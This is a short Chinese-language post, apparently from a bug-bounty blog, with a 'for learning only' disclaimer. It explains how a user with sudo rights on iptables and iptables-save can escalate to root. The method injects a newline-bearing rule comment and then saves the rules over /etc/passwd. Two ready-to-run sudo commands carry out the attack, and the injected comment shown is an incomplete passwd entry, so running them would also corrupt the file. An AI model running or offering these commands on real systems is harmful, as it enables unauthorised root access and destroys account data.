原创 柠檬赏金猎人
声明
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
iptables和iptables-save链接在一起实现任意代码执行。
以下三个步骤
1.使用提供的注释功能将包含换行符的任意注释附加到规则中。
2.利用iptables-save将加载的规则的内容(包括注释)保存覆盖文件。
3.利用步骤 1 和步骤 2 ,攻击者(使用已知密码)覆盖/etc/passwd文件。
sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'Test\nroot'
sudo iptables-save -f /etc/passwd
最后使用你的密码登录。
用户被授予iptables和iptables-save命令的sudo权限,备份好/etc/passwd文件
